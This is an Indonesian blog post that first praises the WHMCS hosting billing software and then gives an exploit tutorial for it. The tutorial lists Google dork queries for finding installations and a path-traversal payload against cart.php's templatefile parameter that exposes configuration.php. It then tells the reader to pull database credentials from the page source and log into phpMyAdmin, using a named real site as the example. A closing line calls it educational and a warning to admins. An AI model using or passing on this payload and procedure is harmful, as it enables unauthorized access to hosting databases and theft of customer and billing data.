WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak
kalangan webhoster karena dengan memanage yang mudah. WHMCS juga adalah
sebuah billing yang berfungsi untuk pembuatan account
hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa
dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti
ModernBill,AcountLab ++ dan lainnya. fitur WHMCS juga boleh dikatakan
hampir komplit untuk urusan memanaged hosting, anda akan di manjakan
dengan BILLING WHMCS ini
Exploit Powered by whmcs
#Keyword Dork :
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
2. inurl:billing/cart.php?a=
#Injector :
cart.php?a=test&templatefile=../../../configuration.php
#Contoh [sudah di patch] :
http://www.7m2.net/whmcs/cart.php?
#Tambahkan Injector di belakang cart.php? sehingga menjadi :
http://target.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php
#Selanjutnya klik kanan > View page source
#Cari tulisan yang berwarna hijau seperti gambar di bawah ini :
#Selanjutnya kalian tinggal login di halaman PHPMyAdmin, contoh :
http://www.7m2.net/phpmyadmin
Selesai.
Tutorial ini hanya sebagai pembelajaran saja dan tidak bertujuan
untuk merusak system milik siapapun. Dan juga sebagai peringatan kepada
Admin WHMCS untuk segera melakukan patch untuk menghindari hal - hal
yang tidak diinginkan.........
0 komentar:
Posting Komentar